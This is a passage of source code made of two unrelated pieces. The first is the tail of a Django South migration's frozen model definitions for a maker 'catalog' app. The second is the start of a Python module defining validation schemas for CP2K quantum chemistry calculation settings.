'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.product': {
'Meta': {'object_name': 'Product'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identicalto': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makeys': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'partsused'", 'blank': 'True', 'to': "orm['catalog.Makey']"}),
'makeys_as_tools': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'tools_used'", 'blank': 'True', 'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'sku': ('django.db.models.fields.IntegerField', [], {}),
'space_as_tools': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'tools_in_space'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Space']"}),
'tutorials': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'products'", 'blank': 'True', 'to': "orm['catalog.Tutorial']"})
},
'catalog.productdescription': {
'Meta': {'object_name': 'ProductDescription'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productdescriptions'", 'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'blank': 'True'}),
'user_or_shop': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'catalog.productimage': {
'Meta': {'object_name': 'ProductImage'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productimages'", 'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']", 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.productreview': {
'Meta': {'object_name': 'ProductReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'product_reviews'", 'to': "orm['catalog.Product']"}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.productshopurl': {
'Meta': {'object_name': 'ProductShopUrl'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'productshopurls'", 'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'catalog.question': {
'Meta': {'object_name': 'Question'},
'accepted_answer': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'related_name': "'answer_of'", 'null': 'True', 'blank': 'True', 'to': "orm['catalog.Answer']"}),
'accepted_time': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'description': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'catalog.searchlog': {
'Meta': {'object_name': 'SearchLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.shop': {
'Meta': {'object_name': 'Shop'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'shopimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'catalog.shopreview': {
'Meta': {'object_name': 'ShopReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'shop_reviews'", 'to': "orm['catalog.Shop']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.space': {
'Meta': {'object_name': 'Space'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'admins': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_admins'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'date_of_founding': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'null': 'True', 'blank': 'True'}),
'facebook': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inventory': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'space_inventory'", 'symmetrical': 'False', 'through': "orm['catalog.Inventory']", 'to': "orm['catalog.Product']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'kind': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'last_updated_external': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10', 'blank': 'True'}),
'logo': ('django.db.models.fields.URLField', [], {'max_length': '400', 'null': 'True', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'default': '0', 'null': 'True', 'max_digits': '15', 'decimal_places': '10', 'blank': 'True'}),
'map_zoom_level': ('django.db.models.fields.IntegerField', [], {'default': '13'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_members'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'membership_fee': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'new_inventory': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'space_new_inventory'", 'symmetrical': 'False', 'through': "orm['catalog.NewInventory']", 'to': "orm['catalog.NewProduct']"}),
'new_members': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_new_members'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewUser']"}),
'new_tools': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'space_new_tools'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.NewProduct']"}),
'no_of_members': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'twitter': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'catalog.spacereview': {
'Meta': {'object_name': 'SpaceReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'review': ('django.db.models.fields.CharField', [], {'max_length': '100000'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'space_reviews'", 'to': "orm['catalog.Space']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.textdocumentation': {
'Meta': {'object_name': 'TextDocumentation'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'body': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'text_documentations'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.TextField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.toindexstore': {
'Meta': {'object_name': 'ToIndexStore'},
'added_time': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Location']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'catalog.topmakeys': {
'Meta': {'object_name': 'TopMakeys'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.topproducts': {
'Meta': {'object_name': 'TopProducts'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.topshops': {
'Meta': {'object_name': 'TopShops'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Shop']"})
},
'catalog.toptutorials': {
'Meta': {'object_name': 'TopTutorials'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"})
},
'catalog.topusers': {
'Meta': {'object_name': 'TopUsers'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.tutorial': {
'Meta': {'object_name': 'Tutorial'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'images': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'tutorialimages'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.Image']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.upfile': {
'Meta': {'object_name': 'UpFile'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'filename': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'filetype': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'files'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '1000'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.userflags': {
'Meta': {'object_name': 'UserFlags'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_maker_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'show_makey_intro': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.userinteraction': {
'Meta': {'object_name': 'UserInteraction'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.IntegerField', [], {}),
'event_id': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'interactions'", 'null': 'True', 'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.usernotification': {
'Meta': {'unique_together': "(('user', 'interaction'),)", 'object_name': 'UserNotification'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'interaction': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.UserInteraction']"}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
'catalog.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'aboutme': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'blog_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'college': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'facebook_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'following': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'followers'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['catalog.UserProfile']"}),
'github_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instructables_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'linkedin_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'default': "'Bangalore, India'", 'max_length': '255'}),
'membership': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'patent': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'profile_pic': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Image']", 'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'stackoverflow_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'twitter_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': u"orm['auth.User']"}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'yt_channel_url': ('django.db.models.fields.URLField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'})
},
'catalog.video': {
'Meta': {'object_name': 'Video'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
'embed_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'likes_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'site': ('django.db.models.fields.IntegerField', [], {}),
'thumb_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'catalog.votemakey': {
'Meta': {'unique_together': "(('user', 'makey'),)", 'object_name': 'VoteMakey'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'makey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Makey']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.voteproductreview': {
'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteProductReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ProductReview']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.voteshopreview': {
'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteShopReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.ShopReview']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.votespacereview': {
'Meta': {'unique_together': "(('user', 'review'),)", 'object_name': 'VoteSpaceReview'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'review': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.SpaceReview']"}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'catalog.votetutorial': {
'Meta': {'unique_together': "(('user', 'tutorial'),)", 'object_name': 'VoteTutorial'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tutorial': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Tutorial']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'vote': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
}
}
complete_apps = ['catalog']
| |
__all__ = [
'schema_cp2k_general_settings', 'schema_derivative_couplings', 'schema_single_points',
'schema_distribute_absorption_spectrum',
'schema_distribute_derivative_couplings',
'schema_distribute_single_points',
'schema_absorption_spectrum']
from numbers import Real
from schema import (And, Optional, Or, Schema, Use)
import os
import pkg_resources as pkg
def merge(d1, d2):
"""
merge two dictionaries using without modifying the original
"""
x = d1.copy()
x.update(d2)
return x
schema_cp2k_general_settings = Schema({
# "Basis set to carry out the quantum chemistry simulation"
"basis": str,
# "Pseudo-potential to carry out the quantum chemistry simulation"
"potential": str,
# Charge of the system
Optional("charge", default=0): int,
# Multiplicity
Optional("multiplicity", default=1): int,
# Specify the Cartesian components for the cell vector
"cell_parameters": Or(
Real,
lambda xs: len(xs) == 3 and isinstance(xs, list),
lambda xs: len(xs) == 3 and all(len(r) == 3 for r in xs)),
# Type of periodicity
"periodic": And(
str, Use(str.lower), lambda s: s in (
"none", "x", "y", "z", "xy", "xy", "yz", "xyz")),
# Specify the angles between the vectors defining the unit cell
Optional("cell_angles"): list,
# Path to the folder containing the basis set specifications
Optional("path_basis", default=pkg.resource_filename("nac", "basis")): os.path.isdir,
# Settings describing the input of the quantum package
"cp2k_settings_main": object,
# Settings describing the input of the quantum package
# to compute the guess wavefunction"
"cp2k_settings_guess": object,
# Restart File Name
Optional("wfn_restart_file_name", default=None): Or(str, None),
# File containing the Parameters of the cell if those
# parameters change during the MD simulation.
Optional("file_cell_parameters", default=None): Or(str, None),
# Quality of the auxiliar basis cFIT
Optional("aux_fit", default="verygood"): And(
str, Use(str.lower), lambda s: s in
("low", "medium", "good", "verygood", "excellent"))
})
dict_general_options = {
# Number of occupied/virtual orbitals to use
'active_space': And(list, lambda xs: len(xs) == 2),
# Index of the HOMO
Optional("nHOMO"): int,
# Index of the orbitals to compute the couplings
Optional("mo_index_range"): tuple,
# "default quantum package used"
Optional("package_name", default="cp2k"): str,
# project
